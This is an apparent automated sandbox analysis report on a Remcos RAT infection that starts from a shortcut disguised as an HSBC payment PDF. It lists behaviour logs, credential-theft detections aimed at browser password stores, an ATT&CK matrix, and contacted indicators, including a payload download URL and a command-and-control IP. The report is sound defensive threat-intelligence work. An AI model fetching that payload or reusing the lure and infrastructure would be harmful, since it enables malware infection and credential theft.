Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Queries volume information: C:\Users\user\AppData\Roaming\HODoCxSdp.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_0040A0B0 GetLocalTime,wsprintfW,

17_2_0040A0B0

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_004195F8 GetUserNameW,

17_2_004195F8

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_004468DC _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

17_2_004468DC

Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 3.2.PuttyTest777.pif.37293a8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.HODoCxSdp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.HODoCxSdp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.HODoCxSdp.exe.3869dc8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PuttyTest777.pif.379e9c8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.HODoCxSdp.exe.38df3e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PuttyTest777.pif.379e9c8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.HODoCxSdp.exe.38df3e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.HODoCxSdp.exe.3869dc8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PuttyTest777.pif.37293a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4092646965.0000000001238000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1759395246.000000000104A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1787198536.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1748001168.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PuttyTest777.pif PID: 2108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PuttyTest777.pif PID: 7424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HODoCxSdp.exe PID: 7476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HODoCxSdp.exe PID: 7812, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

17_2_0040A953

Contains functionality to steal Firefox passwords or cookies

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		17_2_0040AA71
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: \key3.db		17_2_0040AA71

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-O7QOC3			Jump to behavior
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-O7QOC3

Yara detected Remcos RAT

Source: Yara match	File source: 3.2.PuttyTest777.pif.37293a8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.HODoCxSdp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.HODoCxSdp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.HODoCxSdp.exe.3869dc8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PuttyTest777.pif.379e9c8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.HODoCxSdp.exe.38df3e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PuttyTest777.pif.379e9c8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.HODoCxSdp.exe.38df3e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.HODoCxSdp.exe.3869dc8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PuttyTest777.pif.37293a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4092646965.0000000001238000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1759395246.000000000104A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1787198536.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1748001168.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PuttyTest777.pif PID: 2108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PuttyTest777.pif PID: 7424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HODoCxSdp.exe PID: 7476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HODoCxSdp.exe PID: 7812, type: MEMORYSTR

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: cmd.exe

17_2_0040567A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Windows Service	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	111 Input Capture	1 Account Discovery	Remote Desktop Protocol	111 Input Capture	21 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Windows Service	14 Obfuscated Files or Information	2 Credentials In Files	1 System Service Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	Login Hook	122 Process Injection	12 Software Packing	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	4 PowerShell	Network Logon Script	1 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	43 System Information Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	211 Masquerading	Cached Domain Credentials	131 Security Software Discovery	VNC	GUI Input Capture	113 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	41 Virtualization/Sandbox Evasion	DCSync	41 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	13 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	122 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Payment Advice__HSBC Banking.pdf.lnk	38%	Virustotal		Browse
Payment Advice__HSBC Banking.pdf.lnk	32%	ReversingLabs	Shortcut.Trojan.Pantera
Payment Advice__HSBC Banking.pdf.lnk	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\HODoCxSdp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\PuttyTest777.pif	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\HODoCxSdp.exe	46%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Roaming\PuttyTest777.pif	46%	ReversingLabs	ByteCode-MSIL.Trojan.Generic

Source	Detection	Scanner	Label
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
https://g.live.com/odclientsettings/ProdV2.C:	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
https://g.live.com/odclientsettings/Prod.C:	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
https://g.live.com/odclientsettings/ProdV2	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0	0%	URL Reputation	safe
http://www.fontbureau.com	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://geoplugin.net/json.gp	0%	URL Reputation	safe
http://www.fontbureau.com/designers/cabarga.htmlN	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.fontbureau.com/designers8	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://geoplugin.net/json.gp2	0%	Avira URL Cloud	safe
https://remisat.com.uy	0%	Avira URL Cloud	safe
http://remisat.com.uy	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpl	0%	Avira URL Cloud	safe
204.10.160.230	0%	Avira URL Cloud	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://remisat.com.uy/zti/hot.exe	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
geoplugin.net	178.237.33.50	true	false		unknown
remisat.com.uy	192.254.232.209	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://geoplugin.net/json.gp	false	URL Reputation: safe	unknown
https://remisat.com.uy/zti/hot.exe	false	Avira URL Cloud: safe	unknown
204.10.160.230	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000002.00000002.1713102823.000001CC901B3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://geoplugin.net/json.gp2	PuttyTest777.pif, 0000000B.00000002.4092646965.000000000128F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/ProdV2.C:	edb.log.4.dr	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.goodfont.co.kr	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://remisat.com.uy	powershell.exe, 00000002.00000002.1690034857.000001CC81351000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://remisat.com.uy	powershell.exe, 00000002.00000002.1690034857.000001CC815E4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	PuttyTest777.pif, 00000003.00000002.1759661809.00000000066C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
